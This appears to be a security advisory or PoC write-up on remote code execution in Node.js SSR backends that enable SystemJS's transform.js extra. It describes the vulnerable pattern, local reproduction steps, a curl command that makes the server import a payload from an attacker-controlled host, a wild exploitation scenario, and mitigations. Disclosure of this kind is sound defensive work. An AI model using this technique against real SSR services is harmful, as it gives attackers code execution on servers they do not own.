# Attack Scenario Notes

## Summary

An application that enables SystemJS `dist/extras/transform.js` in a backend server-side rendering workflow can execute attacker-controlled JavaScript in the Node.js process if the server imports a module URL influenced by a remote user. The transform extra overrides `System.instantiate()` for non-WASM modules, fetches the resolved URL, passes the response text through `loader.transform()`, and evaluates the returned source with indirect `eval`.

## Affected Pattern

The vulnerable application pattern is:

1. Backend Node.js app uses SystemJS for SSR component loading.
2. Backend enables `dist/extras/transform.js`.
3. A remote user can influence the URL passed to `System.import()`.
4. The URL points to JavaScript controlled by the attacker.

In that configuration, the attacker's module is fetched and evaluated inside the server process.

## Local Reproduction

Install dependencies:

```bash
npm install
```

Start the attacker-controlled module host:

```bash
npm run attacker
```

Start the vulnerable SSR backend:

```bash
npm run ssr
```

Trigger a server-side import of the attacker module:

```bash
curl 'http://127.0.0.1:8080/render?component=http://127.0.0.1:9001/payload.js?run=1'
```

Expected result:

```text
/tmp/pwned
/tmp/pwned/systemjs-ssr-rce.txt
```

SystemJS caches imported modules by URL, so for repeated tests delete the proof directory and use a fresh `run=` value to force a new import.

The proof file `/tmp/pwned/systemjs-ssr-rce.txt` contains:

```text
ssr payload executed in backend node process
```

## Wild Exploitation Scenario

In a real deployment, the SSR server could expose an endpoint that renders a plugin, theme, widget, micro-frontend, or component by URL. If that URL is supplied by a tenant, CMS author, preview link, request parameter, database field, or import map entry, an attacker can host a `System.register` payload and cause the backend to import it during SSR.

Because evaluation happens in the backend Node.js context, the impact is code execution with the privileges of the SSR service account. The local PoC uses a directory creation and file write only to demonstrate impact safely.

## Mitigation

Do not use `dist/extras/transform.js` for untrusted or remotely influenced module URLs. Server-side code should only import modules from trusted, allowlisted origins or local paths. When allowlisting, compare the parsed origin (scheme, host and port) of the resolved URL rather than a string prefix, and resolve local specifiers against a fixed directory before handing them to the loader. Treat remote SSR component URLs and dynamic import-map entries as code execution surfaces.